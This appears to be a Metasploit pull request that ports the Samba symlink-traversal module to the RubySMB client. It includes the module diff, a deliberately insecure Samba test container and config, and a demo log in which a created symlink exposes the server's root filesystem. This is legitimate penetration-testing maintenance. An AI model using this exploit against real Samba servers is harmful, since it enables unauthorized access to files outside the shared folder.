### PR TITLE
Update samba_symlink_traversal to use RubySMB

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -612,7 +612,7 @@ GEM
     ruby-progressbar (1.13.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.3.19)
+    ruby_smb (3.3.21)
       bindata (= 2.4.15)
       openssl-ccm
       openssl-cmac

--- a/lib/rex/proto/smb/simple_client.rb
+++ b/lib/rex/proto/smb/simple_client.rb
@@ -279,7 +279,7 @@ class SimpleClient
   def trans_pipe(fid, data, no_response = nil)
     session_lifetime do
       client.trans_named_pipe(fid, data, no_response)
-  end
+    end
   end
 
   def negotiated_smb_version

--- a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb
+++ b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb
@@ -50,17 +50,19 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     print_status('Connecting to the server...')
-    connect(versions: [1])
+    connect(versions: [1], backend: :ruby_smb)
     smb_login
 
     print_status("Trying to mount writeable share '#{datastore['SMBSHARE']}'...")
     simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}")
 
     print_status("Trying to link '#{datastore['SMBTARGET']}' to the root filesystem...")
-    simple.client.symlink(datastore['SMBTARGET'], '../' * 10)
+    simple.client.last_tree.set_unix_link(symlink: datastore['SMBTARGET'], target: '../' * 10)
 
     print_status('Now access the following share to browse the root filesystem:')
-    print_status("\t\\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\")
-    print_line('')
+    print_status("    \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\")
+  rescue RubySMB::Error::UnexpectedStatusCode => e
+    print_error(e.message)
+    elog(e)
   end
 end

--- a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb
+++ b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Auxiliary
     print_status('Now access the following share to browse the root filesystem:')
     print_status("    \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\")
   rescue RubySMB::Error::UnexpectedStatusCode => e
-    print_error(e.message)
-    elog(e)
+    elog(e.message, error: e)
+    fail_with(Failure::UnexpectedReply, e.message)
   end
 end


### PR DESCRIPTION
This loads changes from rapid7/ruby_smb#297 and closes a feature gap between Ruby SMB and the Rex SMB client. With the feature gap closed, `modules/auxiliary/admin/smb/samba_symlink_traversal.rb` can now be switched from Rex to the RubySMB client. One less module in the way of dropping the ancient Rex client.

Most of the logic is on the Ruby SMB side. The `samba_symlink_traversal` module is the only one that appears to use the unix symlink extension in the framework, so it doesn't make sense IMHO to promote the `symlink` method to a first-class method on the SimpleClient instance. The abstraction provided by SimpleClient is also pretty irrelevant in this context because the module will only ever work with SMB1 anyways.

## Testing
- [ ] Build the provided container
- [ ] Run the module
- [ ] Use smbclient to see that a symlink was created to the target's file system root, allowing it to then be explored

<details>
<summary>Containerfile</summary>

```
FROM ubuntu:22.04

RUN apt-get update && \
    apt-get install -y --no-install-recommends samba samba-vfs-modules && \
    rm -rf /var/lib/apt/lists/*

RUN useradd -ms /bin/bash smbuser && \
    (echo "smbuser"; echo "smbuser") | smbpasswd -a -s smbuser

# World-writable share the module drops the symlink into
RUN mkdir -p /srv/samba/tmp && \
    chown smbuser:smbuser /srv/samba/tmp && \
    chmod 0777 /srv/samba/tmp

# Readable file outside the share to prove the escape worked
RUN mkdir -p /srv/samba/secret && \
    echo 'flag{symlink_traversal_works}' > /srv/samba/secret/flag.txt && \
    chmod 0644 /srv/samba/secret/flag.txt

COPY smb.conf /etc/samba/smb.conf

EXPOSE 139 445

CMD ["smbd", "--foreground", "--no-process-group", "--debug-stdout"]
```
</details>

<details>
<summary>smb.conf</summary>

```
[global]
   workgroup = WORKGROUP
   security = user
   map to guest = never
   server min protocol = NT1
   server max protocol = SMB3
   client min protocol = NT1
   ntlm auth = yes
   unix extensions = yes
   wide links = yes
   allow insecure wide links = yes
   log level = 1
   log file = /dev/stdout

[tmp]
   path = /srv/samba/tmp
   writable = yes
   browseable = yes
   guest ok = no
   follow symlinks = yes
   wide links = yes
```
</details>

## Demo

```
msf auxiliary(admin/smb/samba_symlink_traversal) > show options 

Module options (auxiliary/admin/smb/samba_symlink_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.159.128  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      4445             yes       The SMB service port (TCP)
   SMBSHARE   tmp              yes       The name of a writeable share on the server
   SMBTARGET  flag             yes       The name of the directory that should point to the root filesystem


View the full module info with the info, or info -d command.

msf auxiliary(admin/smb/samba_symlink_traversal) > run
[*] Running module against 192.168.159.128
[*] 192.168.159.128:4445 - Connecting to the server...
[*] 192.168.159.128:4445 - Trying to mount writeable share 'tmp'...
[*] 192.168.159.128:4445 - Trying to link 'flag' to the root filesystem...
[*] 192.168.159.128:4445 - Now access the following share to browse the root filesystem:
[*] 192.168.159.128:4445 -     \\192.168.159.128\tmp\flag\
[*] Auxiliary module execution completed
msf auxiliary(admin/smb/samba_symlink_traversal) > smbclient //192.168.159.128/tmp -p 4445 -U smbuser%smbuser -m NT1 --option='client min protocol = NT1' -c 'cd flag1; cd flag; ls'
[*] exec: smbclient //192.168.159.128/tmp -p 4445 -U smbuser%smbuser -m NT1 --option='client min protocol = NT1' -c 'cd flag1; cd flag; ls'

cd \flag1\: NT_STATUS_OBJECT_NAME_NOT_FOUND
  .                                   D        0  Mon Apr 27 11:24:18 2026
  ..                                  D        0  Mon Apr 27 11:24:18 2026
  bin                                 D        0  Fri Apr 24 12:06:49 2026
  boot                                D        0  Mon Apr 18 06:28:59 2022
  dev                                 D        0  Mon Apr 27 11:24:18 2026
  etc                                 D        0  Mon Apr 27 11:24:18 2026
  home                                D        0  Fri Apr 24 12:06:54 2026
  lib                                 D        0  Fri Apr 24 12:06:49 2026
  lib32                               D        0  Thu Apr  9 22:21:57 2026
  lib64                               D        0  Thu Apr  9 22:30:54 2026
  libx32                              D        0  Thu Apr  9 22:21:57 2026
  media                               D        0  Thu Apr  9 22:21:59 2026
  mnt                                 D        0  Thu Apr  9 22:21:59 2026
  opt                                 D        0  Thu Apr  9 22:21:59 2026
  proc                                D        0  Mon Apr 27 11:24:18 2026
  root                                D        0  Thu Apr  9 22:31:01 2026
  run                                 D        0  Mon Apr 27 11:24:18 2026
  sbin                                D        0  Fri Apr 24 12:06:49 2026
  srv                                 D        0  Fri Apr 24 12:06:55 2026
  sys                                 D        0  Mon Apr 27 08:52:28 2026
  tmp                                 D        0  Fri Apr 24 12:06:49 2026
  usr                                 D        0  Thu Apr  9 22:21:59 2026
  var                                 D        0  Thu Apr  9 22:31:01 2026

		207614976 blocks of size 1024. 135440516 blocks available
msf auxiliary(admin/smb/samba_symlink_traversal) > 
```